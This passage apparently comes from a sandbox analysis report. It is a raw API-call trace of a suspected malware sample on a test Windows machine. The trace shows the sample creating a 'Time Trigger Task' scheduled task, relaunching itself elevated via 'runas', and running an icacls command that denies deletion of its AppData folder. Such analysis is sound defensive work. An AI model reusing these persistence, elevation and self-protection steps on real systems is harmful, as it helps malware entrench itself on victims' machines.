(HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.583] IExecAction:put_Arguments (This=0x2850ca0, Arguments="--Task") returned 0x0 [0068.583] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.583] IUnknown:Release (This=0x2850ca0) returned 0x1 [0068.584] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.584] ITaskFolder:RegisterTaskDefinition (in: This=0x64ff98, Path="Time Trigger Task", pDefinition=0x2850968, flags=6, UserId=0x18d930*(varType=0x0, wReserved1=0x315, wReserved2=0xde44, wReserved3=0x18, varVal1=0x420cab, varVal2=0x240000), password=0x18d940*(varType=0x0, wReserved1=0x0, wReserved2=0x100, wReserved3=0x0, varVal1=0x7f, varVal2=0x7), LogonType=3, sddl=0x18d954*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x108), ppTask=0x18de5c | out: ppTask=0x18de5c*=0x2850d10) returned 0x0 [0068.781] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.781] TaskScheduler:IUnknown:Release (This=0x64ff98) returned 0x0 [0068.781] TaskScheduler:IUnknown:Release (This=0x2850968) returned 0x0 [0068.781] IUnknown:Release (This=0x2850d10) returned 0x0 [0068.781] CoUninitialize () [0068.786] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3172528 | out: hHeap=0x240000) returned 1 [0068.786] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31268d8 | out: hHeap=0x240000) returned 1 [0068.786] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31425c0 | out: hHeap=0x240000) returned 1 [0068.786] GetVersion () returned 0x1db10106 [0068.786] lstrcpyW (in: lpString1=0x18e2c0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0068.786] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0068.786] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0068.787] ShellExecuteExW (in: pExecInfo=0x18e084*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e084*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0069.034] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3122a80 | out: hHeap=0x240000) returned 1 [0069.034] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3106c40 | out: hHeap=0x240000) returned 1 [0069.044] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31397c8 | out: hHeap=0x240000) returned 1 [0069.174] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2896a0 | out: hHeap=0x240000) returned 1 [0069.174] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25e8e0 | out: hHeap=0x240000) returned 1 [0069.174] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3152ed8 | out: hHeap=0x240000) returned 1 [0069.174] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3138598 | out: hHeap=0x240000) returned 1 [0069.181] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x261fd8 | out: hHeap=0x240000) returned 1 [0069.265] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x260000 | out: hHeap=0x240000) returned 1 [0069.266] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f34c | out: phModule=0x18f34c) returned 0 [0069.266] ExitProcess (uExitCode=0x0) [0069.270] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3170908 | out: hHeap=0x240000) returned 1 [0069.270] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25f430 | out: hHeap=0x240000) returned 1 [0069.300] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0xb14 Thread: id = 3 os_tid = 0xa04 Thread: id = 4 os_tid = 0xb54 Thread: id = 5 os_tid = 0xb7c Thread: id = 6 os_tid = 0x7b8 Thread: id = 7 os_tid = 0xb80 Thread: id = 21 os_tid = 0xa34 Thread: id = 22 os_tid = 0xa24 Thread: id = 31 os_tid = 0xa54 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9014000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000db03" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0x7c0 Thread: id = 9 os_tid = 0x310 Thread: id = 10 os_tid = 0x128 Thread: id = 11 os_tid = 0x7c8 Thread: id = 12 os_tid = 0x6cc Thread: id = 13 os_tid = 0x644 Thread: id = 14 os_tid = 0x63c Thread: id = 15 os_tid = 0x154 Thread: id = 16 os_tid = 0x150 Thread: id = 17 os_tid = 0x120 Thread: id = 18 os_tid = 0x124 Thread: id = 19 os_tid = 0x118 Thread: id = 20 os_tid = 0x3fc Process: id = "3" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x304d1000" os_pid = "0x518" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb04" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0xa64 Thread: id = 24 os_tid = 0x594 Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x7a9ca000" os_pid = "0x530" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {DAD14AF5-82A5-4514-AFD0-06330000279A} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x230 Thread: id = 26 os_tid = 0x5b8 Thread: id = 27 os_tid = 0x598 Thread: id = 28 os_tid = 0x548 Thread: id = 29 os_tid = 0x53c Thread: id = 30 os_tid = 0x534 Thread: id = 57 os_tid = 0x8fc Process: id = "5" image_name = "243e.tmp.exe.del105265203.del105731312.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe" page_root = "0x32495000" os_pid = "0x6f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb04" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0x9f4 [0069.543] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x96e4cca0, dwHighDateTime=0x1d5d6b4)) [0069.543] GetCurrentProcessId () returned 0x6f8 [0069.544] GetCurrentThreadId () returned 0x9f4 [0069.544] GetTickCount () returned 0x1157cce [0069.544] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=21001295902) returned 1 [0069.580] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0069.580] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2030000 [0069.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.584] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0069.584] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0069.585] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0069.585] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0069.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.585] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.585] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.586] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.586] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.586] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.587] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.587] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.587] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.587] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.588] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.588] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0069.588] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x214) returned 0x20307d0 [0069.588] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.588] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0069.588] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0069.589] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.589] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0069.589] GetCurrentThreadId () returned 0x9f4 [0069.589] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0069.589] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x800) returned 0x20309f0 [0069.589] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0069.589] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0069.589] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0069.590] SetHandleCount (uNumber=0x20) returned 0x20 [0069.590] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --Admin IsNotAutoStart IsNotTask" [0069.590] GetEnvironmentStringsW () returned 0x643ee8* [0069.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0069.590] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x565) returned 0x20311f8 [0069.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x20311f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0069.590] FreeEnvironmentStringsW (penv=0x643ee8) returned 1 [0069.590] GetLastError () returned 0x0 [0069.590] SetLastError (dwErrCode=0x0) [0069.590] GetLastError () returned 0x0 [0069.590] SetLastError (dwErrCode=0x0) [0069.591] GetLastError () returned 0x0 [0069.591] SetLastError (dwErrCode=0x0) [0069.591] GetACP () returned 0x4e4 [0069.591] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x220) returned 0x2031768 [0069.591] GetLastError () returned 0x0 [0069.591] SetLastError (dwErrCode=0x0) [0069.591] IsValidCodePage (CodePage=0x4e4) returned 1 [0069.591] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0069.591] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0069.591] GetLastError () returned 0x0 [0069.591] SetLastError (dwErrCode=0x0) [0069.591] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0069.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.591] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0069.591] GetLastError () returned 0x0 [0069.592] SetLastError (dwErrCode=0x0) [0069.592] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0069.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ廁疈鸘@Ā") returned 256 [0069.592] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ廁疈鸘@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0069.592] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ廁疈鸘@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¤Ïúu\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0069.592] GetLastError () returned 0x0 [0069.592] SetLastError (dwErrCode=0x0) [0069.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ廁疈鸘@Ā") returned 256 [0069.592] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ廁疈鸘@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0069.592] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 